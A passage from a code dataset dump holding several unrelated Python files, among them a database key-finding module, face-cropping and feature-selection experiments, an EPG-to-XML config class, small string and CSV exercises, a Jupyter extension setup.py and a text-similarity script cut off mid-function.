]*[,; ][ ]*')\nupcsplit = True\n\ndef ScanAttr(attrsastxt):\n global upcsplit\n findattr = attrsastxt == ''\n if upcsplit:\n attrs = set(chain(*map(upcSplit, allsep.split(attrsastxt))))\n for a in attrs:\n if len(a) == 0:\n raise NameError('empty string instead of attribute')\n if a[0] not in uppercase:\n raise NameError('attribute does not start with uppercase letters: ' + a)\n\n else:\n attrs = set(allsep.split(attrsastxt))\n return attrs\n\n\ndef ScanAbh(abhhastxt):\n abhh = {}\n for abhtx in sep.split(abhhastxt):\n if abhtx.strip() == '':\n continue\n try:\n li, re = abhtx.split('->', 1)\n except ValueError:\n raise ValueError(\"split by '->' did not succeed for rules: '%s' ('%s')\" % (abhtx, abhhastxt))\n\n li = frozenset(intdepsep.split(li))\n re = set(intdepsep.split(re))\n if upcsplit:\n li = frozenset(chain(*map(upcSplit, li)))\n re = set(chain(*map(upcSplit, re)))\n if li in abhh:\n abhh[li] = abhh[li].union(re)\n else:\n abhh[li] = re\n\n return abhh\n\n\ndef ScanAttrAbh(attrstxt, abhtxt):\n return (\n ScanAttr(attrstxt), ScanAbh(abhtxt))\n\n\nshouldsort = True\n\ndef attr2str(attrs, attrsep='' if upcsplit else ';'):\n attrs = list(attrs)\n if shouldsort:\n attrs.sort()\n return string.join(attrs, attrsep)\n\n\ndef abh2str(li, re):\n attrsep = '' if upcsplit else ';'\n li = list(li)\n re = list(re)\n if shouldsort:\n li.sort()\n re.sort()\n return string.join(li, attrsep) + '->' + string.join(re, attrsep)\n\n\ndef abhh2str(abhh, linesep='\\n'):\n lii = list(abhh.keys())\n\n def setcmp(set1, set2):\n return cmp(string.join(set1, ''), string.join(set2, ''))\n\n if shouldsort:\n lii.sort(setcmp)\n result = ''\n for li in lii:\n result = result + abh2str(li, abhh[li]) + linesep\n\n if '\\n' not in linesep and '\\r' not in linesep:\n result = result[0:-len(linesep)]\n return result\n\n\ndef closure(attrs, abh):\n try:\n haschanged = True\n while haschanged:\n haschanged = False\n for li, re in abh.items():\n if li <= attrs and not re <= attrs:\n attrs = attrs.union(re)\n haschanged = True\n\n except Exception as ex:\n print >> sys.stderr, 'error in dependency: %s->%s' % (li, re)\n raise ex\n\n return attrs\n\n\ndef shuffle(lis, num):\n newlis = []\n positions = 1\n while positions <= len(lis):\n item = lis[(len(lis) - positions)]\n newlis.insert(num % positions, item)\n num = num / positions\n positions += 1\n\n return newlis\n\n\ndef mincoverage(abh, scramble=0, hints={}):\n traverse = []\n for key in abh.keys():\n if len(key) == 1:\n traverse = [key] + traverse\n else:\n traverse.append(key)\n\n traverse = shuffle(traverse, scramble)\n while len(traverse) > 0:\n li = traverse.pop()\n re = abh[li]\n redabh = abh.copy()\n del redabh[li]\n othersclosure = closure(li, redabh)\n newre = re.difference(othersclosure).difference(li)\n liset = set(li)\n precond = liset.union(re)\n newre_list = list(newre)\n if li in hints:\n firsttouch = newre.difference(hints[li])\n lasttouch = newre.difference(firsttouch)\n newre_list = list(firsttouch) + list(lasttouch)\n for r in newre_list:\n precond.remove(r)\n if r in closure(precond, redabh):\n newre.remove(r)\n else:\n precond.add(r)\n\n if len(newre) == 0:\n abh = redabh\n else:\n installed_newre = False\n if len(li) > 1:\n lired = liset\n for l in li:\n tryred = lired.copy()\n tryred.remove(l)\n cls = closure(tryred, redabh)\n if li <= cls:\n lired = tryred\n\n if lired != li:\n abh = redabh\n lired = frozenset(lired)\n if lired in abh:\n abh[lired] = abh[lired].union(newre)\n else:\n abh[lired] = newre\n installed_newre = True\n if not installed_newre:\n abh = redabh\n abh[li] = newre\n\n return abh\n\n\ndef keyBaseSets(attr, abh):\n attrch = dict([ (a, 0) for a in attr ])\n for li, re in abh.items():\n for l in li:\n attrch[l] = attrch[l] | 1\n\n for r in re:\n attrch[r] = attrch[r] | 2\n\n sets = (\n set(), set(), set(), set())\n for a, ch in attrch.items():\n sets[ch].add(a)\n\n return sets\n\n\ndef keysTreeAlg(attr, abh, verbty=None):\n verbty = verbosity if verbty == None else verbty\n ua, li, re, mi = keyBaseSets(attr, abh)\n subkey = frozenset(li.union(ua))\n if closure(subkey, abh) == attr:\n finalkey = subkey\n return (\n finalkey, {finalkey})\n else:\n keys = set()\n curlvl = dict()\n primattr = set()\n lvl = 1\n lpad = ''\n for m in mi:\n csk = subkey.union(frozenset(m))\n if closure(csk, abh) == attr:\n for p in csk:\n primattr.add(p)\n\n keys.add(csk)\n else:\n curlvl[csk] = m\n\n while len(curlvl) > 0:\n prevlvl = curlvl\n curlvl = dict()\n lvl += 1\n lpad += ' '\n for subkey, maxm in prevlvl.items():\n missingattr = set()\n for a in mi:\n if a > maxm and a not in subkey:\n missingattr.add(a)\n\n for m in missingattr:\n newattr = subkey.union(frozenset(m))\n ispartofkey = False\n for key in keys:\n if key <= newattr:\n ispartofkey = True\n break\n\n if not ispartofkey:\n if closure(newattr, abh) == attr:\n keys.add(newattr)\n for p in newattr:\n primattr.add(p)\n\n else:\n curlvl[newattr] = max(maxm, m)\n\n return (\n primattr, keys)","sub_path":"pycfiles/fdtool-0.1.7-py2-none-any/dbschema.py","file_name":"dbschema.py","file_ext":"py","file_size_in_byte":7515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"475165778","text":"import csv\r\nwith open('emp.csv', 'w', newline='') as file:\r\n writer = csv.writer(file)\r\n writer.writerow([\"ID\", \"Name\", \"Age\",\"Salary\"])\r\n writer.writerow([121, \"Revathy S\", \"26\",\"30000\"])\r\n writer.writerow([122, \"Arun Kumar\", \"24\",\"30000\"])\r\n\r\nwith open('emp.csv', 'r') as file:\r\n reader = csv.reader(file)\r\n for row in reader:\r\n print(row)","sub_path":"CO5/CO5_3.py","file_name":"CO5_3.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"62510011","text":"import cv2\nfrom mtcnn import MTCNN\nfrom os import listdir\n\nfor file in listdir('D:\\\\DroneProject\\\\data\\\\record\\\\ashwin'):\n filename = 'D:\\\\DroneProject\\\\data\\\\record\\\\ashwin\\\\'+file\n detector = MTCNN()\n\n image = cv2.cvtColor(cv2.imread(filename), cv2.COLOR_BGR2RGB)\n result = detector.detect_faces(image)\n\n # Result is an array with all the bounding boxes detected. We know that for 'ivan.jpg' there is only one.\n if result:\n for i in range(len(result)):\n bounding_box = result[i]['box']\n\n cv2.rectangle(image,\n (bounding_box[0], bounding_box[1]),\n (bounding_box[0] + bounding_box[2], bounding_box[1] + bounding_box[3]),\n (255, 0, 0),\n thickness= 4)\n roi = image[bounding_box[1]:bounding_box[1] + bounding_box[3],\n bounding_box[0]:bounding_box[0] + bounding_box[2]]\n cv2.imwrite('D:\\\\DroneProject\\\\data\\\\train\\\\ashwin\\\\'+file, roi)\n\n# cv2.circle(image,(keypoints['left_eye']), 2, (0,155,255), 2)\n# cv2.circle(image,(keypoints['right_eye']), 2, (0,155,255), 2)\n# cv2.circle(image,(keypoints['nose']), 2, (0,155,255), 2)\n# cv2.circle(image,(keypoints['mouth_left']), 2, (0,155,255), 2)\n# cv2.circle(image,(keypoints['mouth_right']), 2, (0,155,255), 2)\n\n # cv2.imwrite(\"resultimage.jpg\", cv2.cvtColor(image, cv2.COLOR_RGB2BGR))\n\n# print(result)","sub_path":"takeroi.py","file_name":"takeroi.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"65701799","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[3]:\n\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as mp\nimport math\nimport os\nfrom sklearn import preprocessing\nfrom scipy.io import arff\nimport warnings\nwarnings.filterwarnings('ignore')\n\n\n# In[4]:\n\n\ndef Data_Load(data_path):\n data = arff.loadarff('.//Data//' + data_path)\n df = pd.DataFrame(data[0])\n data = np.array(df)\n m,n=data.shape\n return data,m,n\n\n\n# In[5]:\n\n\ndef compute_N_Y_k(data):\n list_NY = []\n list_data = list(data[:,-1])\n N = list_data.count(b'N')\n Y = list_data.count(b'Y')\n k = math.floor(N/Y)\n return N,Y,k\n\n\n# In[31]:\n\n\ndef compute_scale(data,m,N,Y):\n data_scaled=preprocessing.scale(data[:,:-1], axis=0, with_mean=True,with_std=True,copy=True) \n data_scaled_NY = np.concatenate((data_scaled,data[:,-1].reshape(m,1)),axis=1)\n index = np.arange(m)\n data_scaled = np.concatenate((index.reshape(m,1),data_scaled_NY),axis=1)\n data_scaled_N_index = np.argwhere(data_scaled_NY[:,-1]==b'N')\n data_scaled_Y_index = np.argwhere(data_scaled_NY[:,-1]==b'Y')\n data_scaled_N = data_scaled[data_scaled_N_index].reshape(N,n+1)\n data_scaled_Y = data_scaled[data_scaled_Y_index].reshape(Y,n+1)\n \n return data_scaled_N,data_scaled_Y\n\n\n# In[7]:\n\n\ndef Cal_Distance(data_scaled_N,data_scaled_Y,N,Y,k):\n NY_distance_samples_neighbor = np.empty([0,3],float)\n flag = 0\n i=0\n for s_Y in data_scaled_Y:\n temp_arr = np.array([])\n for s_N in data_scaled_N:\n temp = np.linalg.norm(s_N[1:n]-s_Y[1:n])\n temp_arr = np.append(temp_arr,temp)\n\n temp_arr = temp_arr.reshape((N,1))\n NY_distance = np.concatenate((data_scaled_Y[[i],[0]].repeat(N).reshape(N,1),data_scaled_N[:,[0]],temp_arr),axis=1)\n NY_distance_sample_neighbor = NY_distance[NY_distance[:,2].argsort()].reshape(N,3)[0:k,:]\n NY_distance_samples_neighbor = np.append(NY_distance_samples_neighbor,NY_distance_sample_neighbor,axis=0)\n i = i+1\n return NY_distance_samples_neighbor\n\n\n# In[8]:\n\n\ndef Cal_Feature_Differential(data,NY_distance_samples_neighbor,m,n):\n w_matrix = np.zeros(n-1).reshape(1,n-1)\n NY_M,NY_N = NY_distance_samples_neighbor.shape\n index_ny = NY_distance_samples_neighbor[0:NY_M,0:NY_N-1]\n\n index_y = index_ny[0:NY_M,0].reshape(NY_M).astype(int)\n index_n = index_ny[0:NY_M,1].reshape(NY_M).astype(int)\n\n index_last = np.arange(m)\n data_filter = np.concatenate((index_last.reshape(m,1),data.copy()),axis=1)\n\n samples_feature_differential = np.abs(data_filter[list(index_y),1:n]-data_filter[list(index_n),1:n])\n\n feature_index = np.arange(n-1).reshape(1,n-1)\n \n for feature_differential in samples_feature_differential:\n temp_feature = np.concatenate((feature_index,feature_differential.reshape(1,n-1)),axis=0)\n temp_sorted_feature = temp_feature[:,temp_feature[1].argsort()]\n feature = temp_sorted_feature[1,:].copy()\n j = 1 \n temp_w = np.empty(n-1)\n temp_w[0] = j\n for i in range(n-1):\n if i!=0 :\n if feature[i-1]==feature[i]:\n temp_w[i] = j\n else:\n j = j+1\n temp_w[i] = j\n temp_sorted_feature[1,:]=temp_w\n temp_last_feature = temp_sorted_feature[:,temp_sorted_feature[0].argsort()]\n w_matrix = np.add(temp_last_feature[1,:],w_matrix)\n \n index = np.arange(n-1).reshape(1,n-1)\n last = np.concatenate((index,w_matrix),axis=0)\n last = last[:,last[1].argsort()][::,::-1]\n return last\n\n\n# In[9]:\n\n\nfrom sklearn.model_selection import RepeatedKFold\nfrom sklearn.metrics import auc\nfrom sklearn.metrics import roc_curve\ndef Train_Measure(X,y,clf):\n auc1 = np.empty(100)\n count = 0\n rkf = RepeatedKFold(n_splits=10,n_repeats=10)\n for train_index,test_index in rkf.split(X):\n x_train,x_test = X[train_index],X[test_index]\n y_train,y_test = y[train_index],y[test_index]\n clf.fit(x_train,y_train)\n pre_y = clf.predict_proba(x_test)[:,1]\n fpr,tpr,thresholds = roc_curve(y_test,pre_y)\n auc1[count] = auc(fpr,tpr)\n count += 1\n auc1 = np.nanmean(auc1)\n return auc1\n\n\n# In[10]:\n\n\nfrom sklearn import svm\nfrom sklearn import naive_bayes\nfrom sklearn.tree import DecisionTreeClassifier\ndef Model_Initialize():\n clf_svm = svm.SVC(gamma='auto',probability=True)\n clf_bayes = naive_bayes.GaussianNB()\n clf_tree = DecisionTreeClassifier()\n return clf_svm,clf_bayes,clf_tree\n\n\n# In[32]:\n\n\n\nimport os\nif __name__ == '__main__':\n files = os.listdir('D:\\Code\\Data_Mining_Code\\ex3\\Data')\n for file in files:\n \n Original_Data,m,n = Data_Load(file)\n N,Y,k = compute_N_Y_k(Original_Data)\n data_scaled_N,data_scaled_Y = compute_scale(Original_Data,m,N,Y)\n NY_distance_samples_neighbor = Cal_Distance(data_scaled_N,data_scaled_Y,N,Y,k)\n Feature_Sequence = Cal_Feature_Differential(Original_Data,NY_distance_samples_neighbor,m,n).astype(np.int32)\n data_scaled_N_Y = np.concatenate((data_scaled_N,data_scaled_Y),axis=0)\n data_scaled_N_Y = data_scaled_N_Y[data_scaled_N_Y[:,0].argsort()]\n data = data_scaled_N_Y[:,Feature_Sequence[0,:]+1]\n #将N,Y变换为0,1\n lookupTable,label = np.unique(data_scaled_N_Y[:,n], return_inverse=True)\n data = np.concatenate((data,label.reshape(-1,1)),axis=1)\n if os.path.exists(file+'.txt'):\n continue\n else:\n np.savetxt(file+'.txt',data)\n\n if os.path.exists(file+'.csv'):\n continue\n data = np.loadtxt('D:\\Code\\Data_Mining_Code\\ex3\\\\txtdata\\\\'+str(file)+'.txt')\n m,n = data.shape\n print(file)\n d = int(math.log(N+Y,2))\n print(\"d: \"+ str(d))\n\n clfs = Model_Initialize()\n Feature_index = list(range(1,n+1))\n roc_f1_columns = ['roc_auc_svm','roc_auc_byes','roc_auc_tree'] \n auc_Array = np.array([])\n for i in range(n):\n print(\"Feature 1 To \"+str(i+1))\n for clf in clfs: \n mean_auc = Train_Measure(data[:,0:i+1],data[:,-1],clf)\n auc_Array= np.append(auc_Array,mean_auc)\n auc_Array = auc_Array.reshape(-1,3)\n df = pd.DataFrame(auc_Array,index=Feature_index,columns=roc_f1_columns)\n print(file+' '+'_roc_auc: ')\n print(df)\n df.to_csv(file+'.csv')\n\n# In[ ]:\n\n\n\n\n","sub_path":"ex3/code/Exp_3.py","file_name":"Exp_3.py","file_ext":"py","file_size_in_byte":6439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"503692194","text":"import csv\n# w 只能操作写入 r 只能读取 a 向文件追加\n# w+ 可读可写 r+可读可写 a+可读可追加\n# wb+写入进制数据\n# w模式打开文件,如果而文件中有数据,再次写入内容,会把原来的覆盖掉\nRall=open(\"E:\\\\测试\\\\2.csv\",mode=\"r\")#创建文本或者打开文本\ndata1=Rall.read()#括号里填写字符长度 读取文本全部内容\nprint(data1)\nRall.close()\n\n# Rfirst=open(\"E:\\\\测试\\\\1.txt\",mode=\"r\")\n# data2=Rfirst.readline()#读取第一行数据\n# print(data2)\n# Rfirst.close()\n#\n# Relement=open(\"E:\\\\测试\\\\1.txt\",mode=\"r\")\n# data3=Relement.readlines()#会把每一行的数据作为一个元素放在列表中返回,读取所有行的数据\n# print(data3)\n","sub_path":"对文本读写操作/读取写入数据/读.py","file_name":"读.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"515488217","text":"# -*- coding: utf-8 -*-\nimport argparse\nimport json\nimport logging\nimport os\nimport sys\nimport errno\nfrom copy import copy\n\nfrom epg2xml.utils import dump_json\nfrom epg2xml import __version__, __title__, __description__, __url__\n\nlogger = logging.getLogger(\"CONFIG\")\n\n\nclass Singleton(type):\n _instances = {}\n\n def __call__(cls, *args, **kwargs):\n if cls not in cls._instances:\n cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)\n\n return cls._instances[cls]\n\n\nclass Config:\n __metaclass__ = Singleton\n\n base_config = {\n 'GLOBAL': {\n 'ENABLED': True,\n 'FETCH_LIMIT': 2,\n 'ID_FORMAT': '{ServiceId}.{Source.lower()}',\n 'ADD_REBROADCAST_TO_TITLE': False,\n 'ADD_EPNUM_TO_TITLE': True,\n 'ADD_DESCRIPTION': True,\n 'ADD_XMLTV_NS': False,\n 'GET_MORE_DETAILS': False,\n },\n 'KT': {\n 'MY_CHANNELS': [],\n },\n 'LG': {\n 'MY_CHANNELS': [],\n },\n 'SK': {\n 'MY_CHANNELS': [],\n },\n 'DAUM': {\n 'MY_CHANNELS': [],\n },\n 'NAVER': {\n 'MY_CHANNELS': [],\n },\n 'WAVVE': {\n 'MY_CHANNELS': [],\n },\n 'TVING': {\n 'MY_CHANNELS': [],\n },\n }\n\n base_settings = {\n 'config': {\n 'argv': '--config',\n 'env': 'EPG2XML_CONFIG',\n 'default': os.path.join(os.getcwd(), 'epg2xml.json')\n },\n 'logfile': {\n 'argv': '--logfile',\n 'env': 'EPG2XML_LOGFILE',\n 'default': None\n },\n 'loglevel': {\n 'argv': '--loglevel',\n 'env': 'EPG2XML_LOGLEVEL',\n 'default': 'INFO'\n },\n 'channelfile': {\n 'argv': '--channelfile',\n 'env': 'EPG2XML_CHANNELFILE',\n 'default': os.path.join(os.getcwd(), 'Channel.json')\n },\n 'xmlfile': {\n 'argv': '--xmlfile',\n 'env': 'EPG2XML_XMLFILE',\n 'default': None\n },\n 'xmlsock': {\n 'argv': '--xmlsock',\n 'env': 'EPG2XML_XMLSOCK',\n 'default': None\n },\n 'parallel': {\n 'argv': '--parallel',\n 'env': 'EPG2XML_PARALLEL',\n 'default': False\n },\n }\n\n def __init__(self):\n \"\"\"Initializes config\"\"\"\n # Args and settings\n self.args = self.parse_args()\n self.settings = self.get_settings()\n # Configs\n self.configs = None\n\n @property\n def default_config(self):\n \"\"\"reserved for adding extra fields\"\"\"\n cfg = copy(self.base_config)\n return cfg\n\n def __inner_upgrade(self, settings1, settings2, key=None, overwrite=False):\n sub_upgraded = False\n merged = copy(settings2)\n\n if isinstance(settings1, dict):\n for k, v in settings1.items():\n # missing k\n if k not in settings2:\n merged[k] = v\n sub_upgraded = True\n if not key:\n logger.info(\"Added %r config option: %s\", str(k), str(v))\n else:\n logger.info(\"Added %r to config option %r: %s\", str(k), str(key), str(v))\n continue\n\n # iterate children\n if isinstance(v, dict) or isinstance(v, list):\n merged[k], did_upgrade = self.__inner_upgrade(\n settings1[k], settings2[k], key=k, overwrite=overwrite\n )\n sub_upgraded = did_upgrade if did_upgrade else sub_upgraded\n elif settings1[k] != settings2[k] and overwrite:\n merged = settings1\n sub_upgraded = True\n elif isinstance(settings1, list) and key:\n for v in settings1:\n if v not in settings2:\n merged.append(v)\n sub_upgraded = True\n logger.info(\"Added to config option %r: %s\", str(key), str(v))\n continue\n\n return merged, sub_upgraded\n\n def upgrade_configs(self, currents):\n fields_env = {}\n\n # ENV gets priority: ENV > config.json\n for name, data in self.base_config.items():\n if name in os.environ:\n # Use JSON decoder to get same behaviour as config file\n fields_env[name] = json.JSONDecoder().decode(os.environ[name])\n logger.debug(\"setting from ENV --%s=%s\", name, fields_env[name])\n\n # Update in-memory config with environment settings\n currents.update(fields_env)\n\n # Do inner upgrade\n upgraded_configs, upgraded = self.__inner_upgrade(self.base_config, currents)\n return upgraded_configs, upgraded\n\n def load_with_hidden(self, cfg_old):\n cfg_new = copy(cfg_old)\n for p in cfg_new:\n # push items in GLOBAL as defaults\n for k, v in cfg_old['GLOBAL'].items():\n if k not in cfg_new[p]:\n cfg_new[p][k] = v\n del cfg_new['GLOBAL']\n self.configs = cfg_new\n\n def load(self):\n logger.debug(\"Loading config...\")\n if not os.path.exists(self.settings['config']):\n logger.info(\"No config file found. Creating a default one...\")\n self.save(self.default_config)\n\n try:\n with open(self.settings['config'], 'r', encoding='utf-8') as fp:\n cfg, upgraded = self.upgrade_configs(json.load(fp))\n\n # Save config if upgraded\n if upgraded:\n self.save(cfg)\n exit(0)\n\n self.load_with_hidden(cfg)\n except json.decoder.JSONDecodeError as e:\n logger.error(str(e))\n logger.error('Please check your config here: %s', self.settings['config'])\n exit(1)\n\n def save(self, cfg, exitOnSave=True):\n dump_json(self.settings['config'], cfg)\n if exitOnSave:\n logger.info(\n \"Your config was upgraded. You may check the changes here: %r\",\n self.settings['config']\n )\n\n if exitOnSave:\n exit(0)\n\n def get_settings(self):\n setts = {}\n for name, data in self.base_settings.items():\n # Argrument priority: cmd < environment < default\n try:\n value = None\n # Command line argument\n if self.args[name]:\n value = self.args[name]\n logger.debug(\"setting from ARG --%s=%s\", name, value)\n\n # Envirnoment variable\n elif data['env'] in os.environ:\n value = os.environ[data['env']]\n logger.debug(\"setting from ENV --%s=%s\" % (data['env'], value))\n\n # Default\n else:\n value = data['default']\n logger.debug(\"setting by default %s=%s\" % (data['argv'], value))\n\n setts[name] = value\n\n except Exception:\n logger.exception(\"Exception raised on setting value: %r\" % name)\n\n # checking existance of important files' dir\n for argname in ['config', 'logfile', 'channelfile']:\n filepath = setts[argname]\n if filepath is not None and not os.path.exists(os.path.dirname(filepath)):\n logger.error(FileNotFoundError(errno.ENOENT, os.strerror(errno.ENOENT), filepath))\n sys.exit(1)\n\n return setts\n\n # Parse command line arguments\n def parse_args(self):\n parser = argparse.ArgumentParser(\n prog=__title__,\n description=__description__,\n epilog=f'Online help: <{__url__}>',\n formatter_class=argparse.RawTextHelpFormatter\n )\n\n # Mode\n parser.add_argument(\n 'cmd',\n metavar='command',\n choices=('run', 'update_channels'),\n help=(\n '\"run\": XML 형식으로 출력\\n'\n '\"update_channels\": 채널 정보 업데이트'\n )\n )\n\n # Display version info\n parser.add_argument(\n '-v', '--version',\n action='version',\n version='{} v{}'.format(__title__, __version__)\n )\n\n # Config file\n parser.add_argument(\n self.base_settings['config']['argv'],\n nargs='?',\n const=None,\n help='config file path (default: %s)' % self.base_settings['config']['default']\n )\n\n # Log file\n parser.add_argument(\n self.base_settings['logfile']['argv'],\n nargs='?',\n const=None,\n help='log file path (default: %s)' % self.base_settings['logfile']['default']\n )\n\n # Log level\n parser.add_argument(\n self.base_settings['loglevel']['argv'],\n choices=('DEBUG', 'INFO', 'WARNING', 'ERROR'),\n help='loglevel (default: %s)' % self.base_settings['loglevel']['default']\n )\n\n # Channel file\n parser.add_argument(\n self.base_settings['channelfile']['argv'],\n nargs='?',\n const=None,\n help='channel file path (default: %s)' % self.base_settings['channelfile']['default']\n )\n\n # XML file\n parser.add_argument(\n self.base_settings['xmlfile']['argv'],\n nargs='?',\n const=None,\n help='write output to file if specified'\n )\n\n # XML socket\n parser.add_argument(\n self.base_settings['xmlsock']['argv'],\n nargs='?',\n const=None,\n help='send output to unix socket if specified'\n )\n\n # Run in Parallel\n parser.add_argument(\n self.base_settings['parallel']['argv'],\n action='store_true',\n help='run in parallel (experimental)'\n )\n\n # Print help by default if no arguments\n if len(sys.argv) == 1:\n parser.print_help()\n\n sys.exit(0)\n\n else:\n return vars(parser.parse_args())\n","sub_path":"epg2xml/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":10294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"528945075","text":"# Given a string, write a function to check if it is a permutation of\n# a palindrome. A palindrome is a word or phrase that is the same forwards and backwards. A\n# permutation is a rearrangement of letters. The palindrome does not need to be limited to just\n# dictionary words.\n\ndef is_palindrome_permutaion(s: str) -> bool:\n from collections import Counter\n\n word_count = Counter()\n odd_count = 0\n\n for letter in s.lower():\n if ord('a') <= ord(letter) <= ord('z'):\n word_count[letter] += 1\n \n for count in word_count.values():\n if count % 2 == 1:\n odd_count += 1\n\n return odd_count <= 1\n\nif __name__ == \"__main__\":\n test = 'ssws'\n print(is_palindrome_permutaion(test))\n\n","sub_path":"CTCI/Arrays_and_Strings/palindrom_permutaion.py","file_name":"palindrom_permutaion.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"228896016","text":"\"\"\"\nSetup module for the jupyterlab_swift proxy extension\n\"\"\"\nfrom setuptools import setup, find_packages\n\nsetup_args = dict(\n name = 'jupyterlab_swift',\n description = 'A Jupyter Notebook server extension which acts a proxy for a Swift API.',\n version = '0.2.1',\n author = 'University of Chicago',\n author_email = 'dev@chameleoncloud.org',\n url = 'https://www.chameleoncloud.org',\n license = 'BSD',\n platforms = 'Linux, Mac OS X, Windows',\n keywords = ['jupyter', 'jupyterlab', 'openstack', 'swift'],\n classifiers = [\n 'Intended Audience :: Developers',\n 'Intended Audience :: System Administrators',\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: BSD License',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n ],\n packages = find_packages(),\n include_package_data = True,\n data_files = [\n ('etc/jupyter/jupyter_notebook_config.d', [\n 'jupyter-config/jupyter_notebook_config.d/jupyterlab_swift.json'\n ]),\n ],\n zip_safe = True,\n install_requires = [\n 'notebook'\n ]\n)\n\nif __name__ == '__main__':\n setup(**setup_args)\n","sub_path":"pypi_install_script/jupyterlab_swift-0.2.1.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"147544406","text":"\"\"\"\nThis Python File contains the function that takes in two strings and returns a metric that\nscores the texts similarities on a scale of 0 to 1. It uses the method of Cosine Similarity formula to\ndetermine the score.\n\"\"\"\n\nimport re\nimport math\n\n# List of words that we want to remove (stop words) from the inputted sentences\nSTOP_WORDS = [\"i\", \"me\", \"my\", \"myself\", \"we\", \"our\", \"ours\", \"ourselves\", \"you\",\n \"your\", \"yours\", \"yourself\", \"yourselves\", \"he\", \"him\", \"his\", \"himself\",\n \"she\", \"her\", \"hers\", \"herself\", \"it\", \"its\", \"itself\", \"they\", \"them\",\n \"their\", \"theirs\", \"themselves\", \"what\", \"which\", \"who\", \"whom\", \"this\",\n \"that\", \"these\", \"those\", \"am\", \"is\", \"are\", \"was\", \"were\", \"be\", \"been\",\n \"being\", \"have\", \"has\", \"had\", \"having\", \"do\", \"does\", \"did\", \"doing\", \"a\",\n \"an\", \"the\", \"and\", \"but\", \"if\", \"or\", \"because\", \"as\", \"until\", \"while\",\n \"of\", \"at\", \"by\", \"for\", \"with\", \"through\", \"during\", \"before\", \"after\",\n \"above\", \"below\", \"to\", \"from\", \"up\", \"down\", \"in\", \"out\", \"on\", \"off\",\n \"over\", \"under\", \"again\", \"further\", \"then\", \"once\", \"here\", \"there\",\n \"when\", \"where\", \"why\", \"how\", \"all\", \"any\", \"both\", \"each\", \"few\",\n \"more\", \"most\", \"other\", \"some\", \"such\", \"no\", \"nor\", \"not\", \"only\",\n \"own\", \"same\", \"so\", \"than\", \"too\", \"very\", \"can\", \"will\"]\n\n# List of contractions we want to map to their full words\nCONTRACTION_MAPPING = {\"you'll\": \"you will\", \"don't\": \"do not\", \"we'll\": \"we will\"}\n\n# Texts from the Project Requirements\nSAMPLE_TXT_ONE = \"The easiest way to earn points with Fetch Rewards is to just shop for the products you already \" \\\n \"love. If you have any participating brands on your receipt, you'll get points based on the cost of \" \\\n \"the products. You don't need to clip any coupons or scan individual barcodes. Just scan each \" \\\n \"grocery receipt after you shop and we'll find the savings for you. \"\n\nSAMPLE_TXT_TWO = \"The easiest way to earn points with Fetch Rewards is to just shop for the items you already buy. If \" \\\n \"you have any eligible brands on your receipt, you will get points based on the total cost of the \" \\\n \"products. You do not need to cut out any coupons or scan individual UPCs. Just scan your receipt \" \\\n \"after you check out and we will find the savings for you. \"\n\nSAMPLE_TXT_THREE = \"We are always looking for opportunities for you to earn more points, which is why we also give \" \\\n \"you a selection of Special Offers. These Special Offers are opportunities to earn bonus points on \" \\\n \"top of the regular points you earn every time you purchase a participating brand. No need to \" \\\n \"pre-select these offers, we'll give you the points whether or not you knew about the offer. We \" \\\n \"just think it is easier that way. \"\n\n\n# The first step is to clean the text\n\n# Remove all leading and trailing whitespaces - when people copy and past white spaces can happen\ndef strip_document(txt):\n \"\"\"\n Returns string after removing leading and trailing spaces\n :param txt: String to clean\n :return: String\n \"\"\"\n txt = txt.strip()\n return txt\n\n\n# Convert all the text to lowercase\ndef lower_case(txt):\n \"\"\"\n Returns string after making everything a lowercase\n :param txt: string\n :return: string\n \"\"\"\n txt = txt.lower()\n return txt\n\n\n# Replace all the Contractions in the Document\ndef replace_contraction(txt):\n \"\"\"\n Repalaces contractions with their full word - see dictionary at top file\n :param txt: string\n :return: string\n \"\"\"\n for contraction, full in CONTRACTION_MAPPING.items():\n txt = txt.replace(contraction, full)\n return txt\n\n# Remove all Stop words - they don't have significance for us\ndef remove_stop_words(list_words):\n \"\"\"\n Remove stop words from the string\n :param list_words: string\n :return: string\n \"\"\"\n result = [word for word in list_words if word not in STOP_WORDS]\n return result\n\n\n# Only Keep alphanumeric characters - we are going to use regular expressions to do this\ndef keep_alphanum(txt):\n \"\"\"\n Removes all non alphanumeric characters will return the txt as a list\n :param txt: string\n :return: list\n \"\"\"\n pattern = re.compile(\"\\w+\")\n list_txt = pattern.findall(txt)\n return list_txt\n\n\n# Count duplicate words and create dictionary\ndef word_count(list_words):\n \"\"\"\n Takes in a list and creates a dictionary of the word and the associated word count\n :param list_words: list\n :return: dictionary\n \"\"\"\n dict_word_count = {}\n for word in list_words:\n if word in dict_word_count:\n dict_word_count[word] += 1\n else:\n dict_word_count[word] = 1\n return dict_word_count\n\n\n# We need to get the Union of these two dictionaries\ndef create_txt_union(txt_one, txt_two):\n \"\"\"\n Creates a union of the dictionaries and returns a set of the words (unique)\n :param txt_one: dictionary\n :param txt_two: dictionary\n :return: set\n \"\"\"\n txt_one_set = set(txt_one)\n txt_two_set = set(txt_two)\n txt_union = txt_one_set.union(txt_two_set)\n return txt_union\n\n\n# Creating the vectors for these two dictionaries\ndef 